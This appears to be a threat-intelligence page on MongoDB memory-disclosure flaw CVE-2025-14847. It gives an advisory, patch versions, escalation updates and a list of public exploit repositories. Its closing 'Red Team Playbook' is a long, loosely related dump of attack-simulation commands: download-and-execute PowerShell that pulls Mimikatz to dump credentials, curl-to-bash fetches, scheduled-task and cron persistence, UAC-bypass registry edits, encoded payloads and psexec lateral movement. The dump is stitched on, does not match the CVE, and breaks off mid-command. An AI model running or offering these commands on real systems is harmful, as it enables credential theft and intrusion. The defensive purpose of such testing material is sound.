CVE-2025-14847
Overview
This vulnerability is a memory disclosure issue caused by improper handling of Zlib compressed protocol headers within the MongoDB Server's wire protocol. Specifically, mismatched length fields in the compressed data lead to reading uninitialized heap memory due to the server trusting the client-declared uncompressed size without proper memory initialization. The flaw resides in the zlib decompression logic processing OP_COMPRESSED messages, affecting multiple MongoDB Server versions across several major releases.
Vulnerability Description
Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0.
Impact
An unauthenticated attacker can exploit this vulnerability to remotely read uninitialized heap memory on the MongoDB server, potentially exposing sensitive information such as credentials, session tokens, and API keys. No authentication or user interaction is required to trigger the flaw. This memory disclosure can lead to data breaches and compromise of confidential information stored or processed by the database server, impacting confidentiality and trustworthiness of the affected systems.
Solution
MongoDB Inc. has released patched versions addressing this vulnerability, including MongoDB Server 7.0.28, 8.0.17, 8.2.3, 6.0.27, 5.0.32, and 4.4.30. Users should upgrade affected MongoDB Server installations to these or later versions. Detailed patch instructions and advisories are available at the vendor’s official issue tracker: https://jira.mongodb.org/browse/SERVER-115508. No workarounds have been specified; applying the vendor-provided updates is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with mismatched length fields in Zlib compressed protocol headers presents a significant risk to various versions of MongoDB Server. This issue arises when the server fails to properly validate the length fields in incoming compressed data, potentially allowing an unauthenticated client to read uninitialized heap memory. This flaw can lead to the exposure of sensitive information that may reside in memory, including authentication tokens, user data, or other critical application state information. The exploitation of this vulnerability is particularly concerning given the widespread use of MongoDB in modern web applications and services, where data integrity and confidentiality are paramount.
Attack vectors exploiting this vulnerability are primarily network-based, as the issue allows unauthenticated clients to send specially crafted requests to the server. An attacker could leverage this flaw by sending malformed Zlib-compressed data to the MongoDB instance, triggering the read of uninitialized memory. This could be achieved through various means, including direct access to the database server or via an application that interfaces with MongoDB. Once the attacker successfully reads the uninitialized memory, they may gain access to sensitive information that could be used for further attacks, such as privilege escalation, data exfiltration, or lateral movement within a network.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on MongoDB for storing sensitive data. The risk extends beyond mere data exposure; it can lead to compliance violations, loss of customer trust, and potential financial repercussions. For businesses that handle personal identifiable information (PII) or financial data, the consequences of a breach could result in significant legal liabilities and regulatory fines. Furthermore, the exploitation of this vulnerability could serve as a foothold for attackers to launch more sophisticated attacks against the organization's infrastructure, thereby increasing the overall risk profile.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. First and foremost, it is crucial to ensure that all MongoDB instances are updated to the latest versions that address this vulnerability. Regular patch management practices should be implemented to keep software components up to date. Additionally, organizations should employ network security measures such as firewalls and intrusion detection systems to monitor for unusual traffic patterns that may indicate an attempted exploitation. Implementing strict access controls and authentication mechanisms can also help limit exposure to unauthenticated clients, thereby reducing the attack surface.
In conclusion, the vulnerability associated with mismatched length fields in Zlib compressed protocol headers poses a significant threat to MongoDB Server users. The potential for unauthorized access to sensitive information, coupled with the ease of exploitation, makes this issue a priority for organizations utilizing this database technology. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, businesses can better protect themselves against the risks posed by this vulnerability and ensure the integrity and confidentiality of their data.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2025-14847, with a significant increase in detection telemetry indicating broader scanning and exploitation attempts. This surge is accompanied by a slight upward adjustment in the Exploit Prediction Scoring System (EPSS), reflecting growing confidence in the vulnerability’s exploitability in the wild. Notably, several new proof-of-concept exploit tools have emerged on public code repositories, enhancing accessibility for both security researchers and potential adversaries. While ransomware usage remains unconfirmed, the expanding availability of functional exploits raises the likelihood of this vulnerability being integrated into automated attack frameworks. For defenders, this evolution underscores an increased urgency to monitor for exploitation attempts and reassess exposure risk, as the vulnerability’s exploitation potential is becoming more tangible and widespread. Consequently, the threat level associated with CVE-2025-14847 should be considered elevated, warranting heightened vigilance.
Update 2 — June 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-14847, accompanied by the emergence of multiple new proof-of-concept exploits on public platforms. This proliferation of publicly accessible exploit code has lowered the barrier for adversaries, enabling a broader range of threat actors to conduct unauthenticated memory disclosure attacks against vulnerable MongoDB instances. Our telemetry indicates an upward trend in exploitation-related activity, reflected in a rising EPSS score, signaling increased likelihood of successful compromise attempts. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanded exploit landscape and heightened detection frequency suggest a growing risk of integration into automated attack frameworks. Consequently, the threat level associated with CVE-2025-14847 has escalated, warranting enhanced monitoring and prioritization within defensive operations.
Update 3 — July 06, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-14847, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on GitHub, enhancing adversaries’ capabilities to identify and leverage vulnerable MongoDB instances. Although the EPSS score remains stable, the increased exploit activity and expanded availability of detection tools significantly raise the likelihood of widespread scanning and opportunistic attacks. Importantly, there is still no confirmed linkage to ransomware groups; however, the rapid proliferation of exploit code suggests this vulnerability could soon be integrated into automated attack frameworks, increasing the risk of data exposure or service disruption. Consequently, the threat level for CVE-2025-14847 has escalated to a heightened state, underscoring the need for vigilant monitoring and prioritization within defensive operations.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*
|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*
|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*
|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*
|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*
|
|
|
Mongodb | Mongodb | All |
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed
auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
|
Alexander Hagenah, Diego Ledda, Joe Desimone | Unknown | - | View |
GitHub PoCs (42)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Black1hp/mongobleed-scanner
MongoDB CVE-2025-14847 Heap Memory Leak Scanner | OP_COMPRESSED zlib Vulnerability | Bug Bounty & Red Team Tool
|
Black1hp | 35 | 5 | 2025-12-27 | View |
|
cybertechajju/CVE-2025-14847_Expolit
a critical memory disclosure vulnerability in MongoDB's zlib compression handling. This tool allows security researchers...
|
cybertechajju | 32 | 3 | 2025-12-27 | View |
|
ProbiusOfficial/CVE-2025-14847
poc for CVE-2025-14847
|
ProbiusOfficial | 26 | 7 | 2025-12-26 | View |
|
onewinner/CVE-2025-14847
MongoDB 内存泄露漏洞 (CVE-2025-14847) 检测工具
|
onewinner | 14 | 2 | 2025-12-26 | View |
|
Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847
Exploit lab, docker and code scanner for mongobleed Vulnerability CVE-2025-14847 plus Phoenix Security Sync tools
|
Security-Phoenix-demo | 13 | 2 | 2025-12-29 | View |
|
chinaxploiter/CVE-2025-14847-PoC
Academic proof-of-concept demonstrating CVE-2025-14847 for authorized security research.
|
chinaxploiter | 4 | 0 | 2025-12-29 | View |
|
franksec42/mongobleed-exploit-CVE-2025-14847
Explot, Lab, Scanner - external and docker container, for SMongobleed-CVE-2025-14847 plus phoenix security uploader
|
franksec42 | 3 | 1 | 2025-12-28 | View |
|
lincemorado97/CVE-2025-14847
CVE-2025-14847 – MongoDB Unauthenticated Memory‑Leak Exploit
|
lincemorado97 | 1 | 3 | 2025-12-29 | View |
|
joshuavanderpoll/CVE-2025-14847
CVE-2025-14847 (MongoBleed)
|
joshuavanderpoll | 3 | 0 | 2025-12-29 | View |
|
peakcyber-security/CVE-2025-14847
CVE-2025-14847 | MongoBleed vulnerability proof of concept project
|
peakcyber-security | 2 | 0 | 2026-01-12 | View |
|
CadGoose/MongoBleed-CVE-2025-14847-Fully-Automated-scanner
Full automation check for CVE-2025-14847 MonogBleed- Finds origin IP and tests for exploit.
|
CadGoose | 1 | 1 | 2026-01-07 | View |
|
alexcyberx/CVE-2025-14847_Expolit
|
alexcyberx | 2 | 0 | 2026-01-13 | View |
|
sho-luv/MongoBleed
CVE-2025-14847 (MongoBleed) scanner and exploit tool. Unauthenticated MongoDB heap memory leak via zlib decompression. D...
|
sho-luv | 2 | 0 | 2026-02-07 | View |
|
sakthivel10q/CVE-2025-14847
🛠 Exploit the CVE-2025-14847 vulnerability in MongoDB to disclose sensitive heap memory using a Python script that analy...
|
sakthivel10q | 1 | 1 | 2025-07-30 | View |
|
nma-io/mongobleed
golang test tool for mongobleed (cve-2025-14847)
|
nma-io | 2 | 0 | 2025-12-27 | View |
|
dawnsmithcyber/azure-vulnerability-remediation-project
End-to-end vulnerability management lifecycle on Azure Windows Server 2025. Features OS patching and network-level compe...
|
dawnsmithcyber | 1 | 0 | 2026-04-06 | View |
|
NoNameError/MongoBLEED---CVE-2025-14847-POC-
This repo contains my python script version of CVE-2025-14847 (MongoBleed)
|
NoNameError | 1 | 0 | 2025-12-30 | View |
|
waheeb71/CVE-2025-14847
CVE-2025-14847 MongoDB Memory Leak Exploit
|
waheeb71 | 1 | 0 | 2026-01-06 | View |
|
AdolfBharath/mongobleed
CVE-2025-14847 explaination and lab
|
AdolfBharath | 1 | 0 | 2026-01-09 | View |
|
InfoSecAntara/CVE-2025-14847-MongoDB
|
InfoSecAntara | 1 | 0 | 2026-01-21 | View |
|
j0lt-github/mongobleedburp
Burp Suite extension to detect CVE-2025-14847 (MongoBleed) via manual leak tests from a dedicated UI tab.
|
j0lt-github | 0 | 1 | 2025-12-30 | View |
|
FurkanKAYAPINAR/CVE-2025-14847-MongoBleed-Exploit
CVE-2025-14847 MongoBleed - MongoDB Memory Leak Vulnerability PoC
|
FurkanKAYAPINAR | 1 | 0 | 2025-12-30 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
shokribardiya/CVE-2025-14847-mongobleed
CVE-2025-14847 mongobleed python file
|
shokribardiya | 0 | 0 | 2026-06-14 | View |
|
KingHacker353/CVE-2025-14847_Expolit
|
KingHacker353 | 0 | 0 | 2025-12-27 | View |
|
kuyrathdaro/cve-2025-14847
MongoBleed: CVE-2025-14847 Memory Leak Discovery Tool
|
kuyrathdaro | 0 | 0 | 2025-12-29 | View |
|
im-hanzou/mongobleed
CVE-2025-14847 PoC exploit for MongoDB heap memory disclosure
|
im-hanzou | 0 | 0 | 2026-01-08 | View |
|
sahar042/CVE-2025-14847
|
sahar042 | 0 | 0 | 2026-01-11 | View |
|
pedrocruz2202/mongobleed-scanner
🔍 Scan for MongoDB vulnerabilities with MongoBleed, a high-performance tool for detecting CVE-2025-14847 across large ne...
|
pedrocruz2202 | 0 | 0 | 2026-01-14 | View |
|
tunahantekeoglu/MongoDeepDive
Context-Aware Memory Leak Scanner & Exploit for CVE-2025-14847.
|
tunahantekeoglu | 0 | 0 | 2025-12-29 | View |
|
vfa-tuannt/CVE-2025-14847
Remake of CVE-2025-14847 MongoDB vulnerability demonstration
|
vfa-tuannt | 0 | 0 | 2025-12-30 | View |
|
Systemhaus-Schulz/MongoBleed-CVE-2025-14847
MongoBleed CVE-2025-14847 Vulnerability Checker
|
Systemhaus-Schulz | 0 | 0 | 2026-01-01 | View |
|
ElJoamy/MongoBleed-exploit
MongoBleed (CVE-2025-14847) Lab & PoC : A complete educational environment to reproduce the critical unauthenticated mem...
|
ElJoamy | 0 | 0 | 2026-01-02 | View |
|
keraattin/Mongobleed-Detector-CVE-2025-14847
Mongobleed Detector CVE-2025-14847
|
keraattin | 0 | 0 | 2026-01-04 | View |
|
sakthivel10q/sakthivel10q.github.io
🛠 Exploit the CVE-2025-14847 MongoDB vulnerability to reveal sensitive information through crafted zlib-compressed packe...
|
sakthivel10q | 0 | 0 | 2026-01-15 | View |
|
amnnrth/CVE-2025-14847
This script is used to identify MongoDB services that are network-exposed and allow unauthenticated protocol handshakes....
|
amnnrth | 0 | 0 | 2026-01-20 | View |
|
0xBlackash/CVE-2025-14847
CVE-2025-14847
|
0xBlackash | 0 | 0 | 2026-02-23 | View |
|
saereya/CVE-2025-14847---MongoBleed
|
saereya | 0 | 0 | 2025-12-27 | View |
|
JemHadar/MongoBleed-DFIR-Triage-Script-CVE-2025-14847
The script focuses on safe artifact acquisition first, followed by optional on-host analysis, and produces a portable, h...
|
JemHadar | 0 | 0 | 2025-12-28 | View |
|
14mb1v45h/CYBERDUDEBIVASH-MONGODB-DETECTOR-v2026
Detect exposed MongoDB instances and CVE-2025-14847 "MongoBleed" risks — Zero-Trust Python scanner
|
14mb1v45h | 0 | 0 | 2025-12-29 | View |
|
Rishi-kaul/CVE-2025-14847-MongoBleed
|
Rishi-kaul | 0 | 0 | 2025-12-31 | View |
|
pedrocruz2202/pedrocruz2202.github.io
🛡️ Detect vulnerable MongoDB instances with the high-performance MongoBleed scanner for CVE-2025-14847, ensuring network...
|
pedrocruz2202 | 0 | 0 | 2026-01-14 | View |
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Database
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-47 | Buffer Overflow via Parameter Expansion |
30%
|
Medium | High |
Red Team Playbook
95 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
